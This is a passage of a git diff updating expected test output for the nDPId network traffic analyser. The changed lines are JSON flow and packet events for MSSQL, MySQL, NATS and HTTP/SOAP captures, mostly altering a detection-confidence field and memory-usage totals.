00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":14142,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":60,"global_ts_msec":1278068444666} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 @@ -66,9 +66,9 @@ ~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5921038 bytes -~~ total memory freed........: 5921038 bytes -~~ total allocations/frees...: 118203/118203 +~~ total memory allocated....: 6017887 bytes +~~ total memory freed........: 6017887 bytes +~~ total allocations/frees...: 120959/120959 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2417 chars diff --git a/test/results/mysql-8.pcap.out b/test/results/mysql-8.pcap.out index 8748c5124..544715fab 100644 --- a/test/results/mysql-8.pcap.out +++ b/test/results/mysql-8.pcap.out @@ -4,8 +4,8 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":87,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946708780104} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869559 bytes -~~ total memory freed........: 5869559 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003193 bytes +~~ total memory freed........: 6003193 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 680 chars diff --git a/test/results/nats.pcap.out b/test/results/nats.pcap.out index 856c4e388..52a205caa 100644 --- a/test/results/nats.pcap.out +++ b/test/results/nats.pcap.out @@ -4,14 +4,14 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":912,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1586288042776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875382 bytes -~~ total memory freed........: 5875382 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6009016 bytes +~~ total memory freed........: 6009016 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 672 chars diff --git a/test/results/ndpi_match_string_subprotocol__error.pcapng.out b/test/results/ndpi_match_string_subprotocol__error.pcapng.out index b5b87953d..08137a331 100644 --- a/test/results/ndpi_match_string_subprotocol__error.pcapng.out +++ b/test/results/ndpi_match_string_subprotocol__error.pcapng.out @@ -3,10 +3,10 @@ 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"} 01989{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1258162014576,"pkt":"AFBWmXinAB9to6gACABFAASOMZxAADwGYf4KAwkTCkSJdp64H5sCrVC4lwIqi1AYwhBuiwAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aWNlIEhUVFAvMS4xDQpTT0FQQWN0aW9uOiANCkNvbnRlbnQtdHlwZToAQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogOTQ4DQoNCjxzb2FwZW52OkVudmVsb3Bl2nhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpCb2R5PgogICAgPG5zOmNvbmZpZ3VyZT4KICAgICAgPG9iamVjdE5hbWQ+TldNMzoxLTEtMS0xNy4wLjA8L29iamVjdKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 